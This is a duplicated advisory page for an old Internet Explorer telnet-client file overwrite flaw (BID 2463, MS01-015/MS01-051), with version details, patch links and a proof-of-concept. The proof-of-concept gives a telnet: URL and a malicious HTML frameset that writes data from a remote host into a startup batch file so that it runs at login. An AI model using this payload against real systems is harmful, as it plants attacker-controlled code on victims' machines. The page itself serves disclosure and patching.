Microsoft IE Telnet Client File Overwrite Vulnerability
BID:2463
Info
Microsoft IE Telnet Client File Overwrite Vulnerability
| Bugtraq ID: | 2463 |
| Class: | Origin Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 09 2001 12:00AM |
| Updated: | Mar 09 2001 12:00AM |
| Credit: | Discovered by Oliver Friedrichs <[email protected]> and posted to Bugtraq on March 13, 2001. Posted in a Microsoft Security Bulletin (MS01-015) on March 6, 2001. Microsoft released Microsoft Security Bulletin MS01-051 on October 10, 2001 stating the eff |
| Vulnerable: |
Microsoft Internet Explorer 5.0.1 SP2 Microsoft Internet Explorer 5.0.1 SP1 Microsoft Internet Explorer 5.0.1 Microsoft Internet Explorer 6.0 Microsoft Internet Explorer 5.5 SP2 Microsoft Internet Explorer 5.5 SP1 Microsoft Internet Explorer 5.5 |
| Not Vulnerable: | |
Exploit / POC
Microsoft IE Telnet Client File Overwrite Vulnerability
The following exploit has been provided by Oliver Friedrichs <[email protected]>:
The following URL will cause IE to connect to the host and initiate the logging function:
telnet:-f%20\file.txt%20host
The following is an example of a malicious HTML message which could cause data that is received from the destination port on the host "host" to be written to the file "filename" in the startup directory for all users. If the logged in user has the appropriate permissions, a batch file will be created and executed upon future authentication.
<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\Documents%20and%Settings\All%20Users
\start%20menu\programs\startup\start.bat%20host%208000>
</frameset>
</html>
The following exploit has been provided by Oliver Friedrichs <[email protected]>:
The following URL will cause IE to connect to the host and initiate the logging function:
telnet:-f%20\file.txt%20host
The following is an example of a malicious HTML message which could cause data that is received from the destination port on the host "host" to be written to the file "filename" in the startup directory for all users. If the logged in user has the appropriate permissions, a batch file will be created and executed upon future authentication.
<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\Documents%20and%Settings\All%20Users
\start%20menu\programs\startup\start.bat%20host%208000>
</frameset>
</html>
Solution / Fix
Microsoft IE Telnet Client File Overwrite Vulnerability
Solution:
Microsoft has released a patch which rectifies this issue. It should be noted that in order to apply the patches for IE5.01 and IE5.5, you must have Internet Explorer Service pack 2 installed for each product.
Microsoft Internet Explorer 5.5 SP2
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP2
Solution:
Microsoft has released a patch which rectifies this issue. It should be noted that in order to apply the patches for IE5.01 and IE5.5, you must have Internet Explorer Service pack 2 installed for each product.
Microsoft Internet Explorer 5.5 SP2
-
Microsoft Q306121
http://download.microsoft.com/download/ie55sp2/secpac20/5.5_SP2/WIN98M e/EN-US/q306121.exe
Microsoft Internet Explorer 6.0
-
Microsoft Q306121
http://download.microsoft.com/download/IE60/Secpac20/6/W98NT42KMeXP/EN -US/q306121.exe
Microsoft Internet Explorer 5.0.1 SP2
References
Microsoft IE Telnet Client File Overwrite Vulnerability
References:
References:
- Microsoft Security Bulletin (MS01-015) (Microsoft)
- Microsoft Security Bulletin MS01-051 (Microsoft)